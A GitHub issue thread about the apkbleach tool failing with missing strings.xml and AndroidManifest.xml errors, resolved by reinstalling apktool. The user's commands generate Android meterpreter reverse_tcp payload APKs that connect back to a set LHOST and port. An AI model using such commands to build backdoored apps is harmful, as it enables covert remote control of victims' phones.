### ISSUE TITLE
No such file or directory: strings.xml and AndroidManifest.xml

### ISSUE THREAD

**Issue by legilimency31** [graylagx2/apkbleach#8]
Instalation : 

```
sudo apt-get install python3-pip
cd apkbleach
chmod +x install.sh
./install.sh
 
```
```
Collecting argparse
  Using cached argparse-1.4.0-py2.py3-none-any.whl (23 kB)
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (from apkbleach==2.1) (0.4.4)
Requirement already satisfied: pillow in /usr/lib/python3/dist-packages (from apkbleach==2.1) (8.4.0)
Requirement already satisfied: pyfiglet==0.8.post1 in /usr/local/lib/python3.9/dist-packages (from apkbleach==2.1) (0.8.post1)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from apkbleach==2.1) (2.25.1)
Installing collected packages: argparse, apkbleach
  Attempting uninstall: apkbleach
    Found existing installation: apkbleach 2.1
    Can't uninstall 'apkbleach'. No files were found to uninstall.
  Running setup.py develop for apkbleach
Successfully installed apkbleach argparse-1.4.0
```

`apkbleach -g android/meterpreter/reverse_tcp LHOST=11.11.11.11 LPORT=4444 -o file.apk` :

```
Traceback (most recent call last):                                                                                                                                    
  File "/usr/local/bin/apkbleach", line 33, in <module>                                                                                                               
    sys.exit(load_entry_point('apkbleach', 'console_scripts', 'apkbleach')())                                                                                         
  File "/home/dieg/ApkBleach/src/apkbleach/__main__.py", line 64, in main                                                                                             
    start.bleach_apk()                                                                                                                                                
  File "/home/dieg/ApkBleach/src/apkbleach/bleach.py", line 352, in bleach_apk                                                                                        
    for edit_line in fileinput.input([f'{self.decompiled_path}/res/values/strings.xml'], inplace=True):                                                               
  File "/usr/lib/python3.9/fileinput.py", line 249, in __next__                                                                                                       
    line = self._readline()                                                                                                                                           
  File "/usr/lib/python3.9/fileinput.py", line 343, in _readline                                                                                                      
    os.rename(self._filename, self._backupfilename)                                                                                                                   
FileNotFoundError: [Errno 2] No such file or directory: '/home/lol/ApkBleach/src/apkbleach/res/Cache/Decompiled/res/values/strings.xml' -> '/home/lol/ApkBleach/src/apkbleach/res/Cache/Decompiled/res/values/strings.xml.bak'
```

`apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -s 3 --edit-permissions --deploy-all` : 

```
Traceback (most recent call last):                                                                                                                                    
  File "/usr/local/bin/apkbleach", line 33, in <module>                                                                                                               
    sys.exit(load_entry_point('apkbleach', 'console_scripts', 'apkbleach')())                                                                                         
  File "/home/lol/ApkBleach/src/apkbleach/__main__.py", line 64, in main                                                                                             
    start.bleach_apk()                                                                                                                                                
  File "/home/lol/ApkBleach/src/apkbleach/bleach.py", line 241, in bleach_apk                                                                                        
    with open(f'{self.decompiled_path}/AndroidManifest.xml', 'r+') as manifest:                                                                                       
FileNotFoundError: [Errno 2] No such file or directory: '/home/lol/ApkBleach/src/apkbleach/res/Cache/Decompiled/AndroidManifest.xml'         
```

**Comment by legilimency31** [comment]
The problem was the apktool version. The apkbleach said my apktool  was incompatible, asked if i wanted to keep using tthe  incompatible, i said no, and it then fixed it automatically. After this, this error happened.
I fixed it by reinstaling apktol manually : 
`sudo apt-get remove apktool` and followed the instructions https://ibotpeaches.github.io/Apktool/install/
